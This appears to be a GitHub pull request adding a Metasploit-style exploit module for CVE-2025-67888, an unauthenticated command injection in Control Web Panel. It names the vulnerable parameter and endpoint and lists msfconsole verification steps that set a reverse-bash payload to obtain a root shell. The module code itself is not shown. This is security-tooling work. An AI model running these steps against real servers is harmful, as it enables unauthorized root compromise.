Skip to content

add module for CVE-2025-67888 #20806

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
JohannesLks wants to merge 4 commits into
base: master
Choose a base branch
from
Open

add module for CVE-2025-67888 #20806

JohannesLks wants to merge 4 commits into from
+200 −0

Conversation

@JohannesLks
Copy link
Contributor

@JohannesLks JohannesLks commented Dec 24, 2025
edited
Loading

Fixes #20788

Add Control Web Panel API Command Injection Exploit (CVE-2025-67888)

This PR adds a new exploit module for CVE-2025-67888, an unauthenticated OS command injection vulnerability in Control Web Panel (CWP) versions <= 0.9.8.1208.

What does this change do?

Adds exploit/linux/http/control_web_panel_api_cmd_exec which exploits a blind command injection via the key GET parameter in /admin/index.php when api=1 is set. Successful exploitation grants root-level access.

Prerequisites: Softaculous and/or SitePad must be installed via CWP Scripts Manager.

Files Added

  • modules/exploits/linux/http/control_web_panel_api_cmd_exec.rb
  • documentation/modules/exploit/linux/http/control_web_panel_api_cmd_exec.md

Verification

  • Start msfconsole
  • use exploit/linux/http/control_web_panel_api_cmd_exec
  • set RHOSTS <target>
  • set RPORT 2031
  • set SSL true
  • set LHOST <attacker>
  • check
  • Verify target is detected as vulnerable (time-based check)
  • set payload cmd/unix/reverse_bash
  • exploit
  • Verify shell session opens with root privileges
  • Document verified via included documentation file

References

@JohannesLks JohannesLks marked this pull request as draft December 24, 2025 00:26
@bcoles
Copy link
Contributor

bcoles commented Dec 24, 2025

see #20788

Pro-tip: If you write "Fixes #20788", then when this PR is merged that issue will also be closed automatically.

@JohannesLks JohannesLks marked this pull request as ready for review December 24, 2025 11:43
@JohannesLks JohannesLks requested a review from bcoles December 24, 2025 11:43
jvoisin
jvoisin reviewed Dec 26, 2025
View reviewed changes
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@bcoles bcoles Awaiting requested review from bcoles

1 more reviewer

@jvoisin jvoisin jvoisin left review comments

Reviewers whose approvals may not affect merge requirements

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

CVE-2025-67888 — Control Web Panel <= 0.9.8.1208 Unauthenticated OS Command Injection Vulnerability

3 participants

@JohannesLks @bcoles @jvoisin